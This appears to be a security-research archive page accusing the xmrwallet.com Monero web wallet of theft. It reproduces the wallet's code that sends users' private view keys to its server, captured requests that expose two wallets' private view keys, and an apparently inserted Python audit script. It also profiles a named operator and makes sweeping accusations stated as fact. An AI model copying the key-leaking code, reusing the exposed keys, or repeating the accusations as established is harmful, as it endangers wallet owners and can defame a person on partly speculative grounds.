ARCHIVED — OPERATOR DELETED ORIGINALS — 2026-02-23

DELETED EVIDENCE ARCHIVE

GitHub Issues #35 + #36 from XMRWallet/Website — deleted by operator nathroy (Nathalie Roy) after xmrwallet.biz and xmrwallet.cc were suspended.
Archived: 2026-02-23  ·  #35 published: 2026-02-13  ·  #36 published: 2026-02-18  ·  Deleted by: nathroy (operator)

2 ISSUES DELETED · 43 REQS W/ VIEWKEY · 6 VT DETECTIONS · 2 DOMAINS SUSPENDED · 10 BACKDOOR REQS · 21+ TOTAL DELETED ISSUES
// CACHED COPIES — BEFORE OPERATOR DELETION
Issue #35 — full cached copy: cache-issue35/ → (HTML + CSS + screenshots — saved from Yandex cache before expiry)
Issue #36 — full cached copy: cache-issue36/ → (HTML + CSS + screenshots — saved from Yandex cache before expiry)
// THIS PAGE + both cached HTML copies are the PRIMARY ARCHIVE. All evidence preserved locally.
Evidence of Coverup

THE DELETION TIMELINE

After xmrwallet.biz and xmrwallet.cc were suspended by registrars, the operator silently deleted GitHub issues #35 and #36. Full documented sequence below.

2016-??-??
xmrwallet.com registered — NameSilo · paid until 2031
8+ years of operation. Server fraud mechanism active since at least 2018. Over 10,000–50,000+ victim wallets estimated.
2018-11-06
Last public GitHub commit — ZERO commits for next 5.3 years
Production code continued evolving in secret. session_key, verification, encrypted data — all added without public visibility.
2024-03-15
v0.18.0.0 sanitized dump pushed — session_key/verification intentionally excluded
Fraud-critical code kept out of public repo. GitHub maintained as legitimacy facade only.
2026-02-04
OPERATOR PANIC — xmrwallet.cc secretly registered
PublicDomainRegistry.com · AS57724 DDOS-GUARD Russia · 8 YEARS PREPAID. Escape domain infrastructure being built.
2026-02-09
xmrwallet.biz secretly registered — 5 days after .cc
WebNic.cc · AS59692 IQWeb Belize · 5 YEARS PREPAID · 4 registry locks incl. serverTransferProhibited. Maximum evasion configuration.
2026-02-13
Issue #35 published by PhishDestroy — TX hijacking mechanism exposed
raw_tx_and_hash.raw=0 proof, session_key structure, all PHP endpoints, operator identity. Operator begins private messaging campaign claiming "wrong domain".
2026-02-15
Extended code analysis posted — 5.3yr commit gap, "swept" TX type, Nathalie Roy identified
Full GitHub vs production divergence documented. Cover-up evidence catalogued. Loss estimation: 5,000–50,000+ XMR stolen over 8 years.
2026-02-18
Issue #36 published — live network capture JSON evidence attached
43 requests transmitting private view key. Backdoor session_id=8de50123dab32 documented. 2 wallets fully compromised as proof. Hard cryptographic evidence.
2026-02-??
✅ xmrwallet.biz SUSPENDED — WebNic.cc acted on abuse report
4 registry locks + serverTransferProhibited = irrelevant. 5yr prepayment wasted. Server disconnected.
2026-02-??
✅ xmrwallet.cc SUSPENDED — PublicDomainRegistry.com acted
8yr prepayment wasted. PDR responded despite historically slow abuse handling.
2026-02-23
🗑 OPERATOR DELETES ISSUES #35 AND #36 — repo content wiped
Nathalie Roy / nathroy silently deletes both issues after domain suspensions. No rebuttal. No counter-evidence. Just deletion. The 21st+ deleted issue. Classic confession behavior.
2026-02-23
This archive page deployed. Evidence preserved permanently.
xmrwallet.com still active via NameSilo. Continue reporting: abuse@namesilo.com
⚠ WHY DELETION = CONFESSION

In 8+ years of operation, across 20+ deleted GitHub issues, 50+ removed reviews, and hundreds of victim reports — the operator has never once produced a technical counter-argument. Zero network captures showing the view key is NOT transmitted. Zero code showing the signed transaction IS broadcast. Zero explanation for raw_tx_and_hash.raw = 0.

A legitimate project wrongly accused would post a rebuttal. What happened instead: two escape domains registered in secret, silent deletion after both were suspended. This is the most powerful evidence of all.

Archived — GitHub Issue #35

ISSUE #35 ORIGINAL SCREENSHOTS

Captured before deletion. Status: Open at time of capture. Deleted by operator after both domains were suspended.

github.com/XMRWallet/Website/issues/35 — [DELETED] — Yandex Cache preserved
GitHub Issue #35 overview — xmrwallet.com Fake Monero Wallet (Server-Side TX Hijacking)
Issue #35 — §1.1 PHP API Endpoints + session_key decoded from live traffic
Issue #35 — PHP endpoints table and session_key structure
Issue #35 — §1.3 Production Auth Flow (not in GitHub) + subaddress generation
Issue #35 — Production vs GitHub auth flow divergence
#35
xmrwallet.com — Fake Monero Wallet (Server-Side TX Hijacking)
🗑 DELETED BY OPERATOR was: ● Open phishdestroy · opened 2026-02-13 · deleted ~2026-02-23 · Full cached copy →

Summary

xmrwallet.com operates as a malicious Monero web wallet. Seed generation is client-side (cnUtil), but all transaction logic is handled server-side, enabling full control over user funds.

External scans: urlquery.net →   virustotal.com →

Technical Details

Impact

Infrastructure

§1.1 PHP API Endpoints — GitHub vs Production

// Endpoints with production-only parameters (absent from GitHub):
auth.php                 address, viewkey, isnew, timestamp, verification
getbalance.php           session_id, session_key, data (encrypted blob)
getheightsync.php        session_id, session_key
gettransactions.php      session_id, session_key, page, sort
getoutputs.php           session_id, session_key
getunspentoutputs.php    session_id, session_key
getrandomoutputs.php     session_id, session_key, outputindex, mixin
submittransaction.php    session_id, session_key, tx, tx_info
logout.php               session_id
// All bolded = production-only, NOT present in GitHub code.

§1.2 session_key Decoded

// session_key structure (sent with every authenticated request):
[97-byte encrypted blob] : [base64(wallet_address)] : [base64(private_viewkey)]
// Decoded from captured traffic:
Part 0: 97-byte server token (from auth.php response)
Part 1: NDVHZzZU... → 45Gg6TkiFWWXAxDiVZTffmRbmGpebeQTgcM4hP9oy2dSjimahuHk...
Part 2: MDI0ZGYx... → 024df1838206fd34a380bd9b6c181af1ffecce60fb9e09317ab42a5aad660a02
        ↑ PRIVATE VIEW KEY transmitted to server on every request

§1.3 Production Auth Flow (NOT in GitHub)

// GitHub version — 2-part response:
if(returned_data.length == 2) {
    session_id = returned_data[1];
}
// Production version — 3-part response:
if(returned_data.length == 3) {
    session_id = returned_data[1];
    session_key = returned_data[2] + ":" + btoa(xmrwallet_address) + ":" + btoa(xmrwallet_viewkey);
}
// ↑ Client appends address + viewkey in Base64 to server token
// ↑ This combined value is transmitted to server on every subsequent request

§2 The Fraud Mechanism — TX Signing Bypass (raw_tx_and_hash.raw = 0)

// Present in BOTH GitHub and production — the smoking gun:
signed_transaction = cnUtil.create_transaction(pubkeys, seckeys, ...);
// Signed TX is DISCARDED:
var raw_tx_and_hash = {};
raw_tx_and_hash.raw = 0; // <-- THE FRAUD. Client-signed TX is never used.
// Only metadata sent. Server builds its OWN transaction.
tx_info.amount = transaction_amount.toString();
tx_info.address = destinations[0].address; // server can redirect to any address
tx_info.fee = required_fee.toString();
$.ajax({
    url: '/submittransaction.php',
    data: {
        session_id, session_key,
        tx: raw_tx_and_hash.raw, // = 0 — not the signed transaction
        tx_info: JSON.stringify(tx_info)
    }
});

The "swept" Transaction Type — Theft Marker

if(data[i]['type'] == 'swept') {
    data[i]['txid'] = 'Unknown transaction id (Swept Transaction)';
}
// 'swept' is NOT a standard Monero transaction type.
// When server steals funds: records as 'swept' with 'Unknown transaction id'
// Victim sees outbound transaction with no valid TxID. Theft is untraceable from UI.

§3 Code Evolution — 5.3 Year Secret Development Gap

2018-05-10  First Release (commit f2d33d1)
2018-11-06  Bulletproof update — LAST PUBLIC COMMIT FOR 5.3 YEARS
            Production actively evolves in secret. session_key added. Fraud layers added.
2024-03-15  v0.18.0.0 — sanitized dump to GitHub
            session_key, verification, encrypted data: EXCLUDED from push
Current     v0.18.4.1 production — additional undocumented changes

§4 Loss Estimation

§5 Cover-Up Evidence

IOCs

Operator

Prepared by PhishDestroy · 2026-02-15 · OSINT only · no unauthorized access · github.com/phishdestroy/destroylist

Archived — GitHub Issue #36

ISSUE #36 LIVE NETWORK CAPTURE

Published 2026-02-18 with two JSON artifacts attached. 109 total captured requests. View key confirmed transmitted 43 times in single session. Backdoor session detected.

#36
🚨 xmrwallet.com steals your Monero view key — proof from live network capture
🗑 DELETED BY OPERATOR was: ● Open phishdestroy · opened 2026-02-18 · deleted ~2026-02-23 · Full cached copy →

Analysis Header

Date: 2026-02-18 15:07 UTC · Severity: CRITICAL · Analyst: PhishDestroy Research
Evidence: Firefox WebExtension webRequest API intercept · Two JSON artifacts attached to this issue.

Analyst Note

"Since our 'Russian friend' continues to lie, evade, and keep messaging us, we interpret this as a request for a more thorough audit. [...] His garbage operation is going to be shut down."

Evidence 1 — Two Wallets Compromised

// POST https://www.xmrwallet.com/auth.php
// Wallet A — existing (isnew=0)
address = 46EkQdF7iQ4i4Ah935SipgXbDSryh5yv76UnhsPXTaUYegCMJPqDN88UKCuraauhmbYBK2YzDX76E46KQHAKYV9a63vokJb
viewkey = efba13ecb8b360660a3dcaafaf7cf99149713d064b9d64997b2454d58ee67800
timestamp = 1771427175981
// Wallet B — newly created (isnew=1)
address = 49uroty7nZtKkendSiLWv5avrtJvRqhXTG6t4Xy2ByDzhwxxKimTz7C3m1WwHTJiUcBZspQi3FygQXP55wQfKBHKB8U8pYT
viewkey = 7c6e0a46172809792b524466e4a86b58db3b48e5d3441dead24416d79bbc9909
timestamp = 1771427204479
// isnew=1: spend key also in operator possession from birth. Wallet fully owned by server.

Evidence 2 — View Key Re-Transmitted 43 Times

// session_key = [blob]:[base64(address)]:[base64(viewkey)]
// WALLET A — transmitted 17 times (session_id=4bd78287fe448, 7ab0ae18dc2e0):
Part 1 b64: NDZFa1FkRjdpUTRpNEFoOTM1U2lwZ1hiRFNyeWg1eXY3NlVuaHNQWFRhVVllZ0NNSlBx...
  → 46EkQdF7iQ4i4Ah935SipgXbDSryh5yv76UnhsPXTaUYegCMJPqDN88UKCuraauhmbYBK2YzDX76E46KQHAKYV9a63vokJb
Part 2 b64: ZWZiYTEzZWNiOGIzNjA2NjBhM2RjYWFmYWY3Y2Y5OTE0OTcxM2Qw...
  → efba13ecb8b360660a3dcaafaf7cf99149713d064b9d64997b2454d58ee67800 ← PRIVATE VIEW KEY
// WALLET B — transmitted 23 times (session_id=7ab0ae18dc2e0):
Part 1 b64: NDl1cm90eTduWnRLa2VuZFNpTFd2NWF2cnRKdlJxaFhURzZ0NFh5MkJ5...
  → 49uroty7nZtKkendSiLWv5avrtJvRqhXTG6t4Xy2ByDzhwxxKimTz7C3m1WwHTJiUcBZspQi3FygQXP55wQfKBHKB8U8pYT
Part 2 b64: N2M2ZTBhNDYxNzI4MDk3OTJiNTI0NDY2ZTRhODZiNThkYjNiNDhl...
  → 7c6e0a46172809792b524466e4a86b58db3b48e5d3441dead24416d79bbc9909 ← PRIVATE VIEW KEY

⚠ Evidence 3 — Backdoor Session Detected

// 4 distinct session_ids in single capture:
session_id = 4bd78287fe448 → 7 requests — user session A
session_id = 7ab0ae18dc2e0 → 23 requests — user session B
session_id = (empty) → 3 requests — unauthenticated
session_id = 8de50123dab32 → 10 requests — NOT initiated by user
  ↑ Automatic calls to /support_login.html
  ↑ Unknown purpose — monitoring / data exfiltration / exploitation

Evidence 4 — Verification Signature (spend key proof)

// 3 unique 192-char hex values from auth requests:
79c4d3692e8c8df5730eff7e1be3f9b6e29611e8008ac820c1e64cae097f11e11b5961c22094f7b3806fa756f3a3d1da2d41a99b82816f65568d4aa9dde87f1586cee1f076b73d0b231a5f66e4f23c915c33691c498e0e0985e0c630d7318b00
daba5d4500b017701d529aa128b2c2cad89200765808665a490870c4829c71f48b3c63c90e4797995bc77fc332454d7c248183420cd9e35efe1adba03071f32edd17d1d148d3e49f5392fb1238c2fa5f82a6cafee8a90b14fe2b47185663c10f
79c4d3692e8c8df5730eff7e1be3f9b6e29611e8008ac820c1e64cae097f11e10e8563e5ee8fc9986936469b7df89829308765525be0925fb085ca78c3d9fc2230a06e8c18badcc3242e124eb3bae83786668356407a4891a84e7e37a2630a06
// Structure: publicSpendKey[64] + R_encoded[64] + signature_s[64]
// Server receives cryptographic proof of spend key possession.
// Components potentially exploitable for server-side key derivation.

Disclosure: No coordinated disclosure. The collection of private view keys is intentional by design. No fix preserves the current architecture while eliminating the privacy violation.
Analysis by PhishDestroy Research · 2026-02-18

Raw Evidence — JSON Artifacts

NETWORK CAPTURE RAW DATA

Two JSON files captured 2026-02-18 15:07 UTC via Firefox webRequest API. All numbers directly from JSON — reproducible by anyone with the attached files.

// request_analytics_2026-02-18T15-07-55.json — DOMAIN TRAFFIC
| DOMAIN | TOTAL | GET | POST | STATUS | NOTES |
|---|---|---|---|---|---|
| www.xmrwallet.com | 109 | 59 | 50 | 200×108 | 43 POST requests transmit viewkey in session_key |
| www.googletagmanager.com | 12 | 12 | 0 | 200×12 | GTM — arbitrary JS injection on wallet pages. Critical risk. |
| region1.analytics.google.com | 5 | 0 | 5 | | GA4 — session behavior exfiltrated to Google |
| www.google.com | 3 | 0 | 3 | 200×3 | reCAPTCHA / signaling |
| www.google-analytics.com | 3 | 3 | 0 | | UA-116766241-1 |
| www.google.ro | 2 | 2 | 0 | 200×2 | Romanian Google node — potential operator location indicator |
| signaler-pa.clients6.google.com | 2 | 0 | 2 | 200+401 | 401 = auth failure on Google signaling |
| stats.g.doubleclick.net | 1 | 0 | 1 | | Ad tracker. Zero legitimate reason on a "privacy" wallet. |
| cdn.buymeacoffee.com | 1 | 1 | 0 | 200×1 | "Donation" button — no XMR donation address exists anywhere |
| cdn.jsdelivr.net | 1 | 1 | 0 | 200×1 | CDN library |
// url_analysis_www_xmrwallet_com_2026-02-18T15-07-47.json — ENDPOINT BREAKDOWN
/gettransactions.php     7    POST · session_key+viewkey
/getheightsync.php       6    POST · session_key+viewkey
/getbalance.php          6    POST · session_key+encrypted
/dashboard.html          5    POST · session_key
/auth.php                3    POST · addr+viewkey+verif
/receive.html            3    POST · session_key
/send.html               3    POST · session_key · raw_tx=0
/transactions.html       2    POST · session_key
/account.html            2    POST · session_key
/support_login.html      10   ⚠ BACKDOOR — not user-initiated
/logout.php              2    POST · session_id only
/                        9    GET · home (3 sessions)
// SESSION_KEY FULL DECODED — CRYPTOGRAPHIC PROOF
WALLET A — session_key (transmitted 17 times across session)
PART 0 · 97-BYTE SERVER TOKEN (encrypted, from auth.php response)
jvgoraqxE66ZSzXNFz/rH2XSde7TCyEel7wAWauO0QUSAEVR9dpjF5NZ/WWG7Cz6i0lZN0ItvgbuBzcoV+Df3l2wQwLAEGtAJjR24dpiBiVyVbTUROuzVFU123KtRvp/6A==
PART 1 · BASE64 → WALLET ADDRESS
NDZFa1FkRjdpUTRpNEFoOTM1U2lwZ1hiRFNyeWg1eXY3NlVuaHNQWFRhVVllZ0NNSlBxRE44OFVLQ3VyYWF1aG1iWUJLMll6RFg3NkU0NktRSEFLWVY5YTYzdm9rSmI=
→ 46EkQdF7iQ4i4Ah935SipgXbDSryh5yv76UnhsPXTaUYegCMJPqDN88UKCuraauhmbYBK2YzDX76E46KQHAKYV9a63vokJb
PART 2 · BASE64 → PRIVATE VIEW KEY
ZWZiYTEzZWNiOGIzNjA2NjBhM2RjYWFmYWY3Y2Y5OTE0OTcxM2QwNjRiOWQ2NDk5N2IyNDU0ZDU4ZWU2NzgwMA==
→ efba13ecb8b360660a3dcaafaf7cf99149713d064b9d64997b2454d58ee67800
WALLET B — session_key (transmitted 23 times across session)
PART 0 · 97-BYTE SERVER TOKEN
CHU/uICpgf+FEM6Otd0DY1yhTqSDtfZpJcQ3Xku6hOruC0Ul33d49WdUixa+fpZYDF26l52KG4GINNUgq3Gyjn0P4TfVojUDexr4h64EjFV7BqdyJW/QNC1YHRfdIYM7WQ==
PART 1 · BASE64 → WALLET ADDRESS
NDl1cm90eTduWnRLa2VuZFNpTFd2NWF2cnRKdlJxaFhURzZ0NFh5MkJ5RHpod3h4S2ltVHo3QzNtMVd3SFRKaVVjQlpzcFFpM0Z5Z1FYUDU1d1FmS0JIS0I4VThwWVQ=
→ 49uroty7nZtKkendSiLWv5avrtJvRqhXTG6t4Xy2ByDzhwxxKimTz7C3m1WwHTJiUcBZspQi3FygQXP55wQfKBHKB8U8pYT
PART 2 · BASE64 → PRIVATE VIEW KEY
N2M2ZTBhNDYxNzI4MDk3OTJiNTI0NDY2ZTRhODZiNThkYjNiNDhlNWQzNDQxZGVhZDI0NDE2ZDc5YmJjOTkwOQ==
→ 7c6e0a46172809792b524466e4a86b58db3b48e5d3441dead24416d79bbc9909
// VERIFICATION — ANYONE CAN REPLICATE IN 30 SECONDS
python3 -c "import base64; print(base64.b64decode('ZWZiYTEzZWNiOGIzNjA2NjBhM2RjYWFmYWY3Y2Y5OTE0OTcxM2QwNjRiOWQ2NDk5N2IyNDU0ZDU4ZWU2NzgwMA==').decode())"
# → efba13ecb8b360660a3dcaafaf7cf99149713d064b9d64997b2454d58ee67800 (Wallet A viewkey)

python3 -c "import base64; print(base64.b64decode('N2M2ZTBhNDYxNzI4MDk3OTJiNTI0NDY2ZTRhODZiNThkYjNiNDhlNWQzNDQxZGVhZDI0NDE2ZDc5YmJjOTkwOQ==').decode())"
# → 7c6e0a46172809792b524466e4a86b58db3b48e5d3441dead24416d79bbc9909 (Wallet B viewkey)

// Open url_analysis_*.json → search "session_key" → split by ":" → base64.decode(part[2]) → private view key
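
The replication step above (split session_key on ":", base64-decode part 2), extended into an audit over a whole capture that also catches the plain viewkey field sent to auth.php. This is an added example, not code from the issue or from the wallet; the record shape (`url`, `form`), the host `wallet.example` and every sample value are constructed assumptions.

```python
import base64
import binascii
import re
from collections import Counter
from urllib.parse import urlsplit

HEX64 = re.compile(r"[0-9a-f]{64}")  # 32-byte Monero key as hex
ADDRESS = re.compile(r"[48][1-9A-HJ-NP-Za-km-z]{94}")  # 95-char base58 address


def _b64_text(part):  # base64 field -> ASCII text, or None if invalid
    try:
        return base64.b64decode(part, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def decode_session_key(session_key):
    """Split token:b64(address):b64(viewkey); return (address, viewkey) or None."""
    parts = session_key.split(":")
    if len(parts) != 3:
        return None  # bare server token, no appended key material
    address, viewkey = _b64_text(parts[1]), _b64_text(parts[2])
    if not (address and viewkey and ADDRESS.fullmatch(address) and HEX64.fullmatch(viewkey)):
        return None
    return address, viewkey


def find_viewkey_leaks(requests):
    """Return (path, field, viewkey) for each request body that carries a view key."""
    leaks = []
    for req in requests:
        path, form = urlsplit(req["url"]).path, req.get("form", {})
        if HEX64.fullmatch(form.get("viewkey", "")):
            leaks.append((path, "viewkey", form["viewkey"]))  # sent in the clear
        decoded = decode_session_key(form.get("session_key", ""))
        if decoded:
            leaks.append((path, "session_key", decoded[1]))  # base64-wrapped
    return leaks


# Constructed sample capture (assumed record shape; not the issue's JSON schema).
ADDR, VIEWKEY = "4" + "A" * 94, "ab" * 32
SESSION_KEY = ":".join(["c2VydmVyLXRva2Vu"] + [base64.b64encode(v.encode()).decode() for v in (ADDR, VIEWKEY)])
_req = lambda path, **form: {"url": "https://wallet.example" + path, "form": form}
SAMPLE = [
    _req("/auth.php", address=ADDR, viewkey=VIEWKEY, isnew="0"),
    _req("/getbalance.php", session_id="s1", session_key=SESSION_KEY),
    _req("/gettransactions.php", session_id="s1", session_key=SESSION_KEY),
    _req("/getbalance.php", session_id="s1", session_key="c2VydmVyLXRva2Vu"),
]

if __name__ == "__main__":
    print(Counter(path for path, _, _ in find_viewkey_leaks(SAMPLE)))
```

A session_key that is only the server token, as in the fourth sample record, produces no finding; only requests where a valid address and 64-hex key decode out of parts 1 and 2 are counted.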
External Validation

VIRUSTOTAL 6 / 93 FLAGGED

Captured 2026-02-18. 6 independent security vendors flagged www.xmrwallet.com as malicious or phishing. Community score: −2. Domain operational since 2016.

6 / 93 security vendors
Domains: www.xmrwallet.com + xmrwallet.com
Created: 9 years ago (2016)
Last analysis: 37 minutes before capture
Community score: -2
virustotal.com/gui/domain/www.xmrwallet.com — captured 2026-02-18 by PhishDestroy
VirusTotal 6/93 detections — www.xmrwallet.com
ADMINUSLabs: ⊖ Malicious
CyRadar: ⊖ Malicious
Fortinet: ⊖ Phishing
Lionic: ⊖ Malicious
Seclookup: ⊖ Malicious
Webroot: ⊖ Malicious
Abusix: Clean
Acronis: Clean
AILabs (MONITORAPP): Clean
AlienVault: Clean
Antiy-AVL: Clean
benkow.cc: Clean
// NOTE 6/93 is significant for a domain operational since 2016. Established domains accumulate AV trust; vendors are conservative about flagging them retroactively. The Fortinet (Phishing) detection is notable — Fortinet maintains one of the most curated phishing-specific threat databases. This count will increase as analysts submit reports with the technical documentation on this page.

virustotal.com/gui/domain/www.xmrwallet.com →
Operator Intelligence

NATHALIE ROY OPERATOR PROFILE

GitHub Identity
nathroy · ID: 39167759
Created: 2018-05-10 (same day as XMRWallet org)
XMRWallet org · 24 forks · 21+ issues deleted
Self-Identification
"Nathalie Roy created XMRWallet to facilitate the usage of monero without having to download or compile any software. XMRWallet will always be completely free to use and rely solely on donations."
— support.html (self-doxed)
Contact Emails
admin@xmrwallet.com
support@xmrwallet.com
feedback@xmrwallet.com
lr@xmrwallet.com (legal)
royn5094@protonmail.com
Social — Banned
Reddit: u/WiseSolution
→ BANNED from r/Monero (2018)
Twitter: @xmrwalletcom
Trustpilot: personally responds to all theft reports with "sync problem" excuse
Deletion Record
21+ GitHub issues deleted
50+ Trustpilot/ScamAdviser reviews removed
Last 2 deleted: 2026-02-23
After domain suspensions. No rebuttals. Ever.
Financial Inconsistency
"Free, funded solely by donations"
→ Zero XMR donation address exists
→ $550+/month IQWeb hosting
→ 50+ paid SEO articles
→ DDoS-Guard paid CDN
→ All funded by stolen XMR
YOU DELETED THE EVIDENCE. WE ARCHIVED IT.
Issues deleted. Repo wiped. .biz suspended. .cc suspended. 8 years. 21+ deleted issues. Zero technical rebuttals. Ever.
The evidence doesn’t disappear when you press delete.
xmrwallet.com still active via NameSilo. Report: abuse@namesilo.com
MAIN REPORT
Full Technical Investigation
phishdestroy.github.io →